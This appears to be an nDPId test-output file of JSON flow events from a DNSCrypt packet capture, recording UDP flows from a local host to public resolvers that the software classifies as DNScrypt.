-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318201,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312405,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317434,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312136,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304815,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396214,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304793,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305459,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299356,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305217,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337079,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312401,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396113,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304791,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348804,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305351,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305330,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304629,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305194,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381015,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312133,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317429,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304360,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 